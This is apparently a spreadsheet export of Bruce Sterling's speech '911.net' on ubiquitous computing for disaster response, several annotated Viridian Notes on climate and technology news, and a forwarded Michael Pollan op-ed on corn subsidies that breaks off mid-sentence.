--------------------------------------------------------
Speech at TTI Vanguard: "Designing for Resiliency" 
Conference"911.net"by Bruce Sterling     Late last month I had the joy and privilege
of hanging out with a big crowd of American computer
scientists who were, basically, trying to find some 
reasons to live.    Despite all evidence to the contrary, they've
definitely got some reasons.    When you go to a conference which is very high-energy, 
with a lot of paradigmatic reassessment going on, where 
ideas are being flung around bodily well outside the box, 
well, that's an impressive thing.  But it's my principle 
as a sometime working journalist  not to get all carried 
away whenever I witness something like that.  They might 
well be drinking their own bathwater.  This sort of thing 
generally requires a reality check from some *other* 
conference.    So, I'm now fresh back from Colorado, from the yearly 
meeting of the High Ground Design Conversation.  These are 
my best pals in the industrial design world, some dear, 
long-time friends of mine, whose judgment I always trust.  
And why would a science fiction writer trust the judgment 
of industrial designers?  Well, because they're very 
*trendy.*  They're very shrewd,  and very stylish, and very 
hands-on people.  They're  peculiarly self-effacing and modest,
yet quite  imaginative.  Better yet, they're even practical.  
So they're kind of like science fiction writers, only with 
much better shoes.    Usually when I go to this High Ground event, I just 
deliver some wacko chat about popular aspects of 
cyberculture and then I take some worshipful notes.  But!  
I have to report that when I took them my notes from the 
"CRA Grand Challenges in Computation" conference, I was 
bringing the noise.    This is the first time I have ever seen their jaws 
drop.  They're still kinda wringing their hands over the 
dotcom boom and the Ka-boom. They miss those glory days of 
the World Wide Web == because for them, that was the 
Graphic Designers Full Employment Act.  So they're pretty 
broke, and they're a little shell-shocked, so I guess they 
should join the club.  But  when I brought them *this* 
stuff == a rather extensively worked-out vision in 
worldbuilding from the point of view of ubiquitous 
computation in the 21st century...  Well, of course this 
is merely a scenario, but to me, "911.net" smells like the 
future.     And frankly, it doesn't smell good.  But that's all 
right.  Because these aren't good times.  These are rather 
harsh, dark times, and in its own peculiar way, 911.net is 
a similarly harsh, dark concept.    "Ubiquitous computation" is by no means a new idea.   
The guy who invented the term is dead, and even his R&amp;D 
lab doesn't look all that great these days.  Ubicomp has 
been around for quite some time == in the table-napkin, 
handwaving stage.  But it's lacked the means, motive and 
opportunity to get any real-world traction.   I believe that may be changing.  If so, it's mostly due 
to the events of September 11.  After that experience, 
ubicomp has got motive and opportunity as it never had 
before.  And the means, although they are still 
speculative, are starting to make some sense.    What am I talking about when I use the term "ubicomp"?  
Well, the term is a grab-bag, a congelation of different 
technologies.  Some are here, commercially available off 
the shelf; some are in the lab; and some may be physically 
impossible.    Let's get down to some brass virtual tacks.  What are 
the key technical drivers for widely distributed, self-
organizing networks of sensors, processors and actuators, 
embedded in the physical world?  And what do you do with 
these things?    Okay, number one:  fuel cells.  Not chemical 
batteries.  Small, portable, dependable, long-lasting, 
power sources with some punch.  They may not be fuel cells 
as they are now known.  They might be MEMS fuel cells, or 
aluminum-air cells, or something enzymatic, I don't care; 
just something much, much better than today's batteries.  
Portable power is the crux.  Ubicomp's  future, if it has one,
entirely hinges on this.  If we don't get some seriously 
advanced,  portable sources of power then everything I am 
about to tell you is a sci-fi phantasm. (Not that there's 
anything wrong with that!)    Number two, RFID.  Radio-Frequency ID == gotta have 
some taggers.  Gotta be on the Net.  It'd be nice if they 
had some powered processors in them.  Something internal, 
pervasive, a little computational action that is going on 
inside physical objects.    Number three, wireless broadband.  Getting real close 
here.   Number four, dongles.  I think this part is seriously 
underappreciated.  This is the weird part of ubicomp, the 
part that may turn out to be its Achilles heel:  some way 
to turn the damn thing off.  And to *know* it's off.  The 
problem of the authorized user.  The authorized 
administrator, the authorized access.  This is likely to 
play out as ubicomp's functional equivalent of the 
Internet's intellectual-property problem.  In other words, 
it's a very serious issue which is going to be neglected 
from the get-go, as people are eagerly building the basic 
infrastructure.  Then, as they lamely try to build it in 
later, they are going to find out that they have 
inadvertently poisoned the water-stream for everybody.    You don't want to wander into a Kazaa and Napster 
version of George Orwell.  Ubiquitous computation, unlike 
information, does not "want to be free."  This is not a 
technology of freedom. Ubiquitous computation wants to 
make you its slave. Try to remember that, for all our 
sakes, all right?  This is not a water-cooler for gossip, 
like the Internet is.  This is a hard-case, hard-times, 
hands-on, rather ruthless command-and-control system.    Number five, GPS, global positioning systems.  Been 
there, done that.    Number six, convoy traffic.  I think this is also 
underestimated, for when I started looking at serious 
applications for ubicomp, time and again, rapidly shipping 
large amounts of physical material in and out of the 
ubicomp zone is a killer application.  Getting stuff in, 
numbering it, assembling it, moving it out. Lots of it. 
Train loads, truck loads, bus loads. And airlifts.    Bringing up the van, a whole bunch of other ubi-stuff, 
of varying degrees of use and practicality.  High speed 
fiber optic networks, check.  Massive storage and routers, 
check.  Big databases, check, but they need to be fast and 
flexible. Some "MobiHoc" action: mobile ad-hoc self-
assembling networks: networks that are always 
reconfiguring in real-time, always on the move.      Facial recognition has a considerable number of 
ubicomp applications, by no means all of them good.  Human 
presence-sensing systems?  Oh yes.  Ruggedized hardware 
suitable for outdoor deployment in all conditions and 
weathers.  Real-time simulation of ongoing major 
situations.  Toxin detectors of various kinds, 
environmental monitoring of almost every sort, biometric 
ID...  I have a long list of these.  I'm cross-checking 
them.  I'm using them to build scenarios.    One thing about 911.net makes it very distinct from 
earlier visions of ubicomp.  This is not Microsoft Windows 
for Housekeeping.  This is a hard, tough web that you 
throw down fast over dire emergencies.  The key concept 
here is that we are finally moving computation out of the 
ivory tower, for good and all.  No more glass boxes of the 
1950s, no more clean abstractions of cyberspace.  We are 
deploying computation at unheard-of speed, into the 
darkest, dirtiest, most dangerous places in the world.    It is a resilient security apparatus for emergencies. 
That is 911.net.      Now, you might well argue that ubicomp is very 
invasive of privacy.  That's just what my industrial 
design pals said about it, immediately, and they were 
right.  It's been hard to find reasonable deployments for 
ubicomp in peacetime commerce and in private homes, 
because it is so Orwellian. However.  Under certain 
circumstances, other social circumstances do trump this 
issue.    For instance, when you are breathing your last under a 
pile of earthquake rubble, you don't really care much 
about privacy under your circumstances.  What you really 
want is  a smart bulldozer, a tourniquet, and some direct 
pressure against your open wounds.  And that is what 
911.net is about == or will be about, should it find its 
way out of the computer-science talking-shop and into 
daylight.       It is an emergency response system for the planet's 
open wounds.  And those wounds exist in plenty.  There are 
more of them all the time.    I rather doubt that the Orwellian version of ubicomp 
has much of a future.  That's a scenario that I have 
dubbed "Terrorspace", which is ubicomp in the context of 
airports and nuclear power sites.  If you've been in 
airports recently, I believe you are seeing a pretty apt, 
early version of Terrorspace.  At any random moment, you 
can have your possessions rifled through by strangers.  
Your shoes are scanned, and various small but vital 
objects in your pockets can be confiscated by semi-
educated security geeks.  They're either pathetically 
under-trained for the job (in which case you certainly 
feel no safer), or else they are intelligent and capable 
people (in which case you pity them and wish they had some 
other job, for the sake of general human happiness and the 
GNP).  Rather than making us any safer, Terrorspace 
airports serve as political indoctrination centers that 
humiliate our voting population on a broad scale. They are 
meant to inure us to ever-escalating levels of 
governmental clumsiness and general harm.    The difficulty with this Terrorspace approach is that 
airports and airlines are going broke.  Airports are 
hemorrhaging money trying to maintain this terrorspace 
apparatus.  It is likely to spread to the brittle power of 
nuclear power plants, nuclear waste dumps, bio-sites, 
chemical sites, liquid petroleum gas centers and so forth. 
That will hugely increase the overhead of all these 
dangerous industries.     That's a very considerable tax burden.  So, though 
Terrorspace may serve as a full employment program for the 
loyal and slightly stupid, that's not going to pay off 
socially or economically in the long run.   However, 911.net is a different matter.   An air-
deployable 911.net that allowed first responders to 
rapidly deal with fires, floods and other major disasters 
would *save* money, especially for the insurers, who are 
already on the ropes.    The actual September 11 event, 9/11, was a rare and 
remarkable thing.  And, with fewer than 3,000 people dead, 
it's just not that big a deal as genuine catastrophes go.  
Politically, theologically and militarily it was huge, but 
a workaday 911.net wouldn't fret much about terrorism.  
Instead, it would have to deal mostly with floods, fires, 
climate change, earthquakes, volcanoes and (let's hope 
never) asteroids and weapons of mass destruction.   So, basically, with 911.net, we are describing a social 
re-definition of computer geeks as firemen.  Native 
twenty-first century computer geeks as muscular, with-it, 
first-responder types.  I think this would be pretty good 
for the computer industry.  We all need to take the 
dysfunctional physical world far more seriously.  This 
week, Italy's flooding, Texas is flooding, Colorado's on 
fire.  This morning, the brand-new wilderness forests 
around the site of the former Chernobyl are on fire, 
spewing radioactive ash hither and yon.   Chunks of 
Antarctica the size of Rhode Island have fallen into the 
sea. I could go on.    This is the sort of activity that humanity is required 
to deal with in this new century. If we build a successful 
method with which to do this, those useful tactics will 
spread across the fabric of our civilization.  I believe 
they are already spreading.  An innovation like 911.net 
will likely serve as a camel's nose in the tent for a 
whole series of ubicomp applications across society.    I've been speculating about these new forms of 
ubicomp, and giving them some flashy neologisms, because 
that is what science fiction writers bring to the table.  
We build little scenario worlds and make up names for 
them.  First we've got "911.net," then "Terrorspace," but 
there are others.BATTLESPACE.  A term already much-used by the Pentagon.  
Battlespace means military C4ISR. The "Revolution in 
Military Affairs."  I would point out that the military, 
unlike some sectors, is not reneging on their enthusiastic 
commitment to the digital revolution.  On the contrary.  I 
haven't seen anybody in the military saying that they long 
to go back to the good-old-fashioned, solid, easy-to-
understand methods of the War in Vietnam.  The military 
are very into "network-centric warfare," and they couldn't 
be happier about their spysats and surveillance drones.PROSTHETIC UBICOMP.  This is eldercare.  A huge, steadily 
growing market. Alzheimer's disease is a flat-out domestic 
catastrophe that lasts seven years.  Any computational 
help here == in elder-proofing spaces, tracking the sick 
and so forth == would be of huge benefit to society.CRADLE.NET.  Babies have no privacy.  Children have little 
privacy. Child-proofing a room against a crawling tot... 
if you've ever done this, you can realize how much use it 
might be to have this process automated.  Any two-year-old 
always wonders:  "Why can't Mr Fork and Miss Wall Socket 
be friends?"  A real-time checklist, at the very least!  
And then we're faced with the interesting, large-scale 
prospects of "K-12.net."STREET.NET.  This would be traffic management and urban 
systems management.  Water networks, power networks,
subways, sidewalks and so forth.PUNISH.NET.  Two million people are in the American prison 
population.  They've got no privacy.  They've gotta be 
watched all the time.  They're basically crammed in iron 
cages now.INDUSTRIAL UBICOMP. Managing supply chains, industrial 
assembly and so forth.  This will eventually be the 
biggest application.SO/HO UBICOMP.  Ubicomp in the home, the home office and 
small office.  Some very interesting consumer uses here, 
but in the grand scheme of things, not that big a deal.SAFETYSPACE.  These would be military bases, U.N. safety 
zones, refugee camps, and disaster evacuation centers.  
It's fairly easy to imagine ubiquitous computation as a 
sinister "gated community" that walls off privileged areas 
under threat.  But we can also think of it as importing 
some human comfort, solidarity, mercy and safety into 
various benighted areas that are severely disturbed.  One 
can imagine a Gorazde UN safe zone version of this, new 
and improved of course: a black helicopter ghosts over in 
the dead of night, deploys a scattering of small drones, 
smart-mines and sensors, and suddenly the war just stops 
within these bounds of Safetyspace.  Rapine, looting, 
sacking, smashing and burning are  ruled out of existence 
through computer awareness.  The handiness of a technique 
like that for life in the 21st century... well, it might 
be a bit underestimated.And last, coming up with a bullet should the good times 
return in all their carefree glory:  UBITOPIA.  This I 
take to be ubicomp as an Urban Entertainment Destination.  
You go there for fun just because there is cool, wacky 
stuff embedded in the physical world, and it's behaving in 
a way that brings joy and hilarity and good spirits, like 
the funhouse mirror at a digital carnival.      When and if Ubitopia really hits, it will mean that 
humanity's basic relationship with our material goods has 
been radically redefined.  That is the apotheosis of 
ubiquitous computation. Just: material goods, and the way 
we deal with them, are different.  Different in character, 
different in quality.  Not recognizable by 20th century 
standards.     So. I have no idea if the Homeland Security 
department, or FEMA or DARPA or the NSF, are going to pony 
up any money for any of these notions.  That's not my 
lookout.  I'm a science fiction writer.  And ladies and 
gentlemen, with this material, I have struck platinum.  
This stuff is really hot.  This is a great, attractive, 
contemporary idea that is really new, really different, 
and really ominous.  The implications are huge and they 
spread across the board of society. I am going to be a 
very busy guy with this material.  If you want to help me, 
send some email.Thanks a lot for your attention.O=c=O O=c=O O=c=O
IT'S HERE
IT'S THERE
IT'S EVERYWHERE
O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts:  Tokyo, urban overheating,
climate change remediationAttention Conservation Notice: a weird,
hand-waving Nipponese mega-scheme.Links:
http://http://www.viridiandesign.org/products/furniture.htm
From:ï¿½Laurence Aurbach 
Subject:ï¿½Viridian Furniture ListThe Viridian Furniture List is now online in the 
"Recommended Products" section of the Viridian website. 
David Bergman did a yeoman-like job assembling this list 
and adding comments. He's also mirroring the list on his 
own furniture site, Fire and Water.
http://cyberg.com/fw/ecofurn.htm Maybe you'll find a woven bamboo buffet or a biopolymer 
mesh coffee table. == L.J. Aurbach
---------------------------------------------------
Entries in the Global Civil Society Design Contest.From: Steven W. Schuldt 
http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpgFrom: Ben Davis 
http://www.digitaleverything.com/GlobalComputer.htmFrom: Joerg F. Wittenberger 
http://www.askemos.org/ 
http://www.askemos.org:9080/RomePaper.pdfFrom: Scott Vandehey 
http://spaceninja.com/viridian/notebook.htmlFrom: Bob Morris 
http://viridianrepository.com/GlobalCivil/From: Anonymous
http://home.freiepresse.de/befis/zx2000.html
http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
http://www.vkb.co.il/From: Jim Thompson 
http://www.simputer.org
http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.htmlFrom: Mike Rosing 
http://www.eskimo.com/~eresrch/viridianFrom: Till Westermayer 
http://www.westermayer.de/till/projekte/02gcsdl.htmFrom:ï¿½Duncan Stewart 
http://www.stewarts.org/viridian/GCSFrom: R. Charles Flickinger 
http://homepage.mac.com/iHUG/GCS2000.htmlFrom:"Kevin Prichard" "I  nominate Rop Gonggrijp's Secure Notebook, which was 
shown recently at H2K2. (http://www.h2k2.net).http://www.nah6.com/
http://www.nah6.com/nah6-h2k2_files/v3_document.html"The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vmware."Sincerely yours, 
Kevin Prichard 
kevin*indymedia.orgThis contest expires in nine days:  August 15, 2002. 
----------------------------------------------------Source: Planet Arkhttp://www.planetark.org/dailynewsstory.cfm/newsid/17160/story.htm"Cooler Tokyo summers may be just a pipe dream away
by Elaine LiesJAPAN: August 5, 2002   "TOKYO == In what could be the ultimate in public works 
projects, a Japanese panel of experts has proposed 
relieving the misery of steamy Tokyo summers by cooling 
the huge city with sea water and a labyrinth of 
underground pipes.    "Though summers are hard in any city, Tokyo's narrow 
streets, hordes of people and clusters of massive 
skyscrapers, largely unrelieved by greenery, produce a 
special brand of discomfort.   "And it gets worse every year.  (((Oh yeah.  You bet it 
does.))) The number of nights when temperatures stay above 
25 Celsius (77 Fahrenheit) in Tokyo has doubled over the 
last 30 years, while average temperatures have shot up by 
2.9 degrees C over the last century. Relief, however 
distant, could be on the way.  ((("Great news, weather 
sufferers!  We live in the high-tech capital of a G-7 
state!")))   "At the behest of the Construction Ministry, the panel 
has drawn up a plan that would use a network of buried 
pipes, and water pumped from the sea, to cool things down. 
'In the very best conditions, certain areas could in 
theory become as much as 2.6 degrees Celsius cooler,' said 
Yujin Minobe, a ministry planner.    "The huge air-conditioning systems currently used to 
cool buildings get rid of the heat they take out of the 
structure by venting it into the outside air, raising 
temperatures still further and creating a 'heat island' 
phenomenon in large cities.  (((Soon whole *cities* will 
do it and vent their heat straight into the rising seas! 
Look out, Antarctica.)))    "Under the plan, this heat would be transferred to 
water in large underground tanks, and the water then 
pumped through a six-km (3.7-mile) network of underground 
pipes to a cooling plant on the Tokyo waterfront.    "There the heat from this water would be transferred 
to cooler sea water before the then-cooled water was 
pumped back through the underground pipes. The sea water, 
now warmed, would be released into the waters of Tokyo 
Bay.    "COSTLY PLAN.  (((That's unsurprising.)))  Minobe said 
the plan would cover some 123 hectares (304 acres) in the 
centre of Tokyo, including the Marunouchi business 
district and the posh Ginza shopping area, and would 
initially cost around 41 billion yen ($344 million).    "'Savings on reduced energy usage would eventually 
help pay for this,' he said.  (((A real nest of ironies 
here, folks.))) Officials quoted in the English-language 
Japan Times said energy savings would total more than 1 
billion yen a year, meaning the system would pay for 
itself in a bit over 30 years.    "However, Minobe said many problems remained with the 
plan, which has only been under discussion since April 
last year. One of the most serious problems is whether 
warmer water being returned to Tokyo Bay would damage the 
fragile marine ecosystem, a point Minobe said still 
required more study.  (((Give it 30 years and there won't 
be any ecosystem left to study.)))    "He said the average temperature cut is likely to be 
only around 0.4 degrees. 'I'm not even sure people would 
be able to feel that difference,' he said. Any such plan, 
however, would likely produce a gleam in the eyes of 
Japan's huge construction industry, known for its 
propensity for public works projects. Although several are 
decried as wasteful, public works projects have long been 
used by the government in attempts to stimulate the 
economy.  (((Nice use of the word "attempts.")))    "Frankly, I think this plan is still really more of a 
dream than anything else," Minobe said. O=c=O O=c=O O=c=O O=c=O
TOKYO STAYS COOL
AS DEADLY HEATWAVE BAKES 
KOBE, OSAKA, KYOTO
O=c=O O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t xml:space="preserve">Key concepts:  Nakamichi Yamasaki, hydrocarbon
generation, carbon dioxide, industrial chemistryAttention Conservation Notice: Yet another
weird Nipponese scheme, about some miracle
gizmo that runs on pollutionLinks:Tornados in Britain?  Maybe it really is the 51st State.
http://www.thesun.co.uk/article/0,,2-2002362050,00.htmlNewfangled suntan pill alleged to have peculiar side-
effects.
http://timesofindia.indiatimes.com/articleshow.asp?art_id=18672487See all those really bright places? Well, that's
where the Greenhouse comes from.
http://www3.cosmiverse.com/news/earthobservatory/0802/images/land_ocean_ice_lights_080602_1bi
g.jpg The West Nile plague has reached Austin.
http://www.planetark.org/dailynewsstory.cfm/newsid/17239/story.htm---------------------------------------------------
Entries in the Global Civil Society Design Contest.From: Steven W. Schuldt 
http://www.americanrobotz.com/images2/Soon_GlobalCivilSocietyLaptop.jpgFrom: Ben Davis 
http://www.digitaleverything.com/GlobalComputer.htmFrom: Joerg F. Wittenberger 
http://www.askemos.org/ 
http://www.askemos.org:9080/RomePaper.pdfFrom: Scott Vandehey 
http://spaceninja.com/viridian/notebook.htmlFrom: Bob Morris 
http://viridianrepository.com/GlobalCivil/From: Anonymous
http://home.freiepresse.de/befis/zx2000.html
http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
http://www.vkb.co.il/From: Jim Thompson 
http://www.simputer.org
http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.htmlFrom: Mike Rosing 
http://www.eskimo.com/~eresrch/viridianFrom: Till Westermayer 
http://www.westermayer.de/till/projekte/02gcsdl.htmFrom:ï¿½Duncan Stewart 
http://www.stewarts.org/viridian/GCSFrom: R. Charles Flickinger 
http://homepage.mac.com/iHUG/GCS2000.htmlFrom: Kevin Prichard 
http://www.nah6.com/
http://www.nah6.com/nah6-h2k2_files/v3_document.htmlFrom: Dave Phelan &lt;dphelan*pavilion.co.uk"Please find my entry here:"
http://www.btinternet.com/~dphelan/viridian/gcs-computer.html"I'm no graphic artist == the feature list is the 
important part of the design."dphelan*pavilion.co.uk  Blog: 
http://www.btinternet.com/~dphelanThis contest expires in four days:   August 15, 2002. 
----------------------------------------------------
Source:
http://www.newscientist.com/news/news.jsp?id=ns99992620"Carbon dioxide turned into hydrocarbon fuel 
(((Please, no immediate lectures on the second law of 
thermodynamics. I have plenty of those.)))"16:00ï¿½02ï¿½Augustï¿½02"A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pressures."Link: Yes, he actually exists:
http://www.it.sakura.ne.jp/~koatsu/c_journal/ab/1_10/01-2.html
http://www.itc.pref.tokushima.jp/English/eindex.html"Making fuel from greenhouse gases"While his work still needs independent verification,  
(((okay, go fetch us some, then))) if he can make even 
heavier hydrocarbons, it might be possible to make petrol. 
It has carbon chains that are between five and 12 atoms 
long == butane is four atoms long.  ((("That's right, 
Professor: I just hook it up to the sky and I make 
gasoline!")))   "The work suggests the tantalising prospect that CO2, 
the main greenhouse gas, could be recycled instead of 
being pumped into the atmosphere.    "Many people have tried before to make hydrocarbons by 
mixing carbon with hydrogen gas in a reaction chamber at 
very high temperatures, but yields have always been 
pitiful. Yamasaki has used hydrochloric acid as his source 
of hydrogen ions. ((("But where are we s'posed to get all 
that hydrochloric acid?" Yes, I know, I know.)))    "He bubbles the CO2 into a reaction vessel where it is 
heated to about 300 C at 100 times atmospheric pressure. 
The heat and pressure are low enough, says Yamasaki, to 
make it feasible to scale up the reaction so it can run on 
a power station's waste heat. (((Imagine the fun when a 
giant tank of pressurized acid blows up.)))"Iron powder    "Using iron powder as a catalyst, Yamasaki says he has 
made substantial amounts of methane, ethane, propane and 
butane, which he was able to vent off as gases when the 
mixture cooled. If he can improve the catalyst's 
performance he is hopeful of making heavier hydrocarbons 
such as petrol, too.     "William Siegfried, who has lead similar experiments 
at the University of Minnesota in the twin cities of 
Minneapolis and St Paul, says his group was only able to 
make methane at far higher temperatures. But his process 
also used a nickel-based alloy as a catalyst, rather than 
iron.    "Siegfried's group was investigating whether natural 
methane deposits might have formed chemically with the 
metal in rocks acting as a catalyst rather than forming 
from the decay of rotting biological material over aeons.  
(((Paging Thomas Gold! "Deep Hot Biosphere" calling on 
line one.)))   "Unless Yamasaki's technology can make the more 
valuable heavier hydrocarbons such as petroleum, which are 
liquid at room temperature, it will not be much more use 
than present-day bioreactors, in which bacteria that like 
to feed on CO2 are induced to produce methane. 'Organisms 
have a special talent for that kind of reaction,' says 
Siegfried.O=c=O O=c=O O=c=O O=c=O
FED-EX IS HERE WITH
YOUR WORLD-SAVING
MIRACLE GIZMO
O=c=O O=c=O O=c=O O=c=O
</t>
  </si>
  <si>
    <t>Key concepts: microbes, methane,
Black Sea, Big Mike the Viridian BugAttention Conservation Notice:   Continues
the Viridian obsession with ecologically
active micro-organisms.Links:GM to give away thousands of electric vehicles - USA 
http://www.planetark.org/dailynewsstory.cfm/newsid/17318/story.htmSinking Pacific states slam US over sea levels - FIJI 
http://www.planetark.org/dailynewsstory.cfm/newsid/17316/story.htmFamished Australian emus invade drought-hit farms - 
AUSTRALIA 
http://www.planetark.org/dailynewsstory.cfm/newsid/17330/story.htm---------------------------------------------------
Entries in the Global Civil Society Design Contest.From: Steven W. Schuldt 
http://www.americanrobotz.com/images2/Soon_GlobalCivilSoci
etyLaptop.jpgFrom: Ben Davis 
http://www.digitaleverything.com/GlobalComputer.htmFrom: Joerg F. Wittenberger 
http://www.askemos.org/ 
http://www.askemos.org:9080/RomePaper.pdfFrom: Scott Vandehey 
http://spaceninja.com/viridian/notebook.htmlFrom: Bob Morris 
http://viridianrepository.com/GlobalCivil/From: Anonymous
http://home.freiepresse.de/befis/zx2000.html
http://apollo.spaceports.com/~bodo4all/zx/zx97.htm
http://www.vkb.co.il/From: Jim Thompson 
http://www.simputer.org
http://www.cnn.com/2002/TECH/ptech/07/05/india.simputer.reut/index.htmlFrom: Mike Rosing 
http://www.eskimo.com/~eresrch/viridianFrom: Till Westermayer 
http://www.westermayer.de/till/projekte/02gcsdl.htmFrom:ï¿½Duncan Stewart 
http://www.stewarts.org/viridian/GCSFrom: R. Charles Flickinger 
http://homepage.mac.com/iHUG/GCS2000.htmlFrom: Kevin Prichard 
http://www.nah6.com/
http://www.nah6.com/nah6-h2k2_files/v3_document.htmlFrom: Dave Phelan 
http://www.nv2.cc.va.us/home/alwhite2/flotsam1.htm From: John Romans  
http://www.panicfire.net/cryptoviridian.htm From:  "Allen Wong" 
http://www.fieldsync.com/viridian/ From: "Joel Westerberg" "Here's my contest entry.  Cheers." 
http://www.unsafe.nu/bigmike/global.PDF From:  "Chris McCormick" "Hi,  I hope i'm not too late!" 
http://mccormick.cx/viridian/ "Regards,  Chris."
http://www.mccormick.cx 
http://www.sciencegirlrecords.com From:  "adrian cotter" "As usual I'm cutting the deadline close... But I've 
honestly been thinking about this one for a good month.  
If only I had one of these, my life would be better."
http://www.nonsensical.com/viridian/notebook/ From: "jg"  
"Emperor Bruce, here it is."
http://solarpc.com/contest.htm From: Kevin Prichard 
Subject: link to Kevin Prichard's own
global civ design entry
http://prichard.org/viridian_globcivsoc.htmlThis contest has now expired.   A winner will
be announced at the discretion of our judge.
----------------------------------------------------Source:
http://www.planetark.org/dailynewsstory.cfm/newsid/17250/story.htm"Germans discover ancient life, offer climate hope"
by Philip Blenkinsop GERMANY: August 12, 2002"BERLIN == German scientists have discovered micro-
organisms deep under the sea that may provide an insight 
into some of the earth's first lifeforms and offer hope in 
the fight against global warming, the Max Planck Society 
said.     "The marine biologists and geologists believe they 
have shown life could have existed by processing methane 
without the presence of oxygen.    "Their findings could also prove useful in ridding the 
earth of excess methane, one of the greenhouse gases many 
scientists believe is responsible for global warming.    "Traditional views of early life on earth centre on 
plants which converted carbon dioxide to oxygen.     "'These (plant lifeforms) date back to between three 
and 3.5 billion years ago... We have found biomass (large 
cluster of organisms) using methane that geologists show 
could have existed around four billion years ago,' 
Professor Antje Boetius, joint author of the study, told 
Reuters.Link:
Yes, she exists.  Dr. Antje does more than exist.  She
gives some kinda publicity shot.  Dang!
http://www.mpi-bremen.de/deutsch/biogeo/aboetius/aboetius.html
http://www.iu-bremen.de/directory/faculty/01063/      "The two-year research by the scientists from 
Hamburg University, the Alfred Wegener Institute in 
northern Bremerhaven and the Max Planck Society centred on 
coral-forming micro-organisms in the Black Sea at depths 
where no oxygen and no light is present.     "The Black Sea contains the largest oxygen-free basin 
in the world.     "The lifeforms were able to process methane together 
with sulphates within the water, producing carbonates, in 
the form of coral, as waste.  (((Black, oxygen-free 
"coral".  I wonder what that stuff looks like.  Maybe you 
could make jewelry out of it.)))     "That they were able to do so without oxygen suggests 
they may have been around before plant life.      "'Perhaps micro-organisms like those found in the 
Black Sea were the original inhabitants of the earth 
during a long period of the earth's history,' said 
Boetius.  (((Yeah, they've just been sitting down there, 
waiting to save our bacon.)))     "She believes the findings could prove useful for 
climate control.     "Previously, scientists had thought that methane, 
found in abundance in the sea and produced through 
agriculture, could only be broken down with oxygen.      "The German researchers believe the discovery of a 
pool of organisms that process methane without oxygen 
could lead to a way of cutting down potentially harmful 
greenhouse gases without burning oxygen and producing 
similarly damaging carbon dioxide.  (((What do they 
*smell* like?)))     "'It could be a way of hindering climate 
catastrophe,'" Boetius said. O=c=O O=c=O O=c=O
BY ALL MEANS 
LET'S HINDER SOME
CATASTROPHE
O=c=O O=c=O O=c=O</t>
  </si>
  <si>
    <t xml:space="preserve">But I *like* corn..-------- Original Message --------
Subject: [interest] FWD: When a Crop Becomes King
Date: Fri, 19 Jul 2002 10:14:23 -0400 (EDT)
From: Donald Eastlake 3rd 
July 19, 2002
When a Crop Becomes King
By MICHAEL POLLANCORNWALL BRIDGE, Conn. --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nation's nearly 80 million-acre field of corn rolls across the
countryside like a second great lawn, but this wholesome, all-American
image obscures a decidedly more dubious reality.Like the tulip, the apple and the potato, zea mays (the botanical name
for both sweet and feed corn) has evolved with humans over the past
10,000 years or so in the great dance of species we call domestication.
The plant gratifies human needs, in exchange for which humans expand the
plant's habitat, moving its genes all over the world and remaking the
land (clearing trees, plowing the ground, protecting it from its
enemies) so it might thrive.Corn, by making itself tasty and nutritious, got itself noticed by
Christopher Columbus, who helped expand its range from the New World to
Europe and beyond. Today corn is the world's most widely planted cereal
crop. But nowhere have humans done quite as much to advance the
interests of this plant as in North America, where zea mays has
insinuated itself into our landscape, our food system and our federal
budget.One need look no further than the $190 billion farm bill President Bush
signed last month to wonder whose interests are really being served
here. Under the 10-year program, taxpayers will pay farmers $4 billion a
year to grow ever more corn, this despite the fact that we struggle to
get rid of the surplus the plant already produces. The average bushel of
corn (56 pounds) sells for about $2 today; it costs farmers more than $3
to grow it. But rather than design a program that would encourage
farmers to plant less corn which would have the benefit of lifting the
price farmers receive for it Congress has decided instead to subsidize
corn by the bushel, thereby insuring that zea mays dominion over its
125,000-square mile American habitat will go unchallenged.At first blush this subsidy might look like a handout for farmers, but
really it's a form of welfare for the plant itself --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Coca-Colas of the world.Our entire food supply has undergone a process of "cornification" in
recent years, without our even noticing it. That's because, unlike in
Mexico, where a corn-based diet has been the norm for centuries, in the
United States most of the corn we consume is invisible, having been
heavily processed or passed through food animals before it reaches us.
Most of the animals we eat (chickens, pigs and cows) today subsist on a
diet of corn, regardless of whether it is good for them. In the case of
beef cattle, which evolved to eat grass, a corn diet wreaks havoc on
their digestive system, making it necessary to feed them antibiotics to
stave off illness and infection. Even farm-raised salmon are being bred
to tolerate corn  not a food their evolution has prepared them for. Why
feed fish corn? Because it's the cheapest thing you can feed any animal,
thanks to federal subsidies. But even with more than half of the 10
billion bushels of corn produced annually being fed to animals, there is
plenty left over. So companies like A.D.M., Cargill and ConAgra have
figured ingenious new ways to dispose of it, turning it into everything
from ethanol to Vitamin C and biodegradable plastics.By far the best strategy for keeping zea mays in business has been the
development of high-fructose corn syrup, which has all but pushed sugar
aside. Since the 1980's, most soft drink manufacturers have switched
from sugar to corn sweeteners, as have most snack makers. Nearly 10
percent of the calories Americans consume now come from corn sweeteners;
the figure is 20 percent for many children. Add to that all the
corn-based animal protein (corn-fed beef, chicken and pork) and the corn
qua corn (chips, muffins, sweet corn) and you have a plant that has
become one of nature's greatest success stories, by turning us (along
with several other equally unwitting species) into an expanding race of
corn eaters.So why begrudge corn its phenomenal success? Isn't this the way
domestication is supposed to work?The problem in corn's case is that we're sacrificing the health of both
our bodies and the environment by growing and eating so much of it.
Though we're only beginning to understand what our cornified food system
is doing to our health, there's cause for concern. It's probably no
coincidence that the wholesale switch to corn sweeteners in the 1980's
marks the beginning of the epidemic of obesity and Type 2 diabetes in
this country. Sweetness became so cheap that soft drink makers, rather
than lower their prices, super-sized their serving portions and
marketing budgets. Thousands of new sweetened snack foods hit the
market, and the amount of fructose in our diets soared.This would be bad enough for the American waistline, but there's also
preliminary research suggesting that high-fructose corn syrup is
metabolized differently than other sugars, making it potentially more
harmful. A recent study at the University of Minnesota found that a diet
high in fructose (as compared to glucose) elevates triglyceride levels
in men shortly after eating, a phenomenon that has been linked to an
increased risk of obesity and heart disease. Little is known about the
health effects of eating animals that have themselves eaten so much
corn, but in the case of cattle, researchers have found that corn-fed
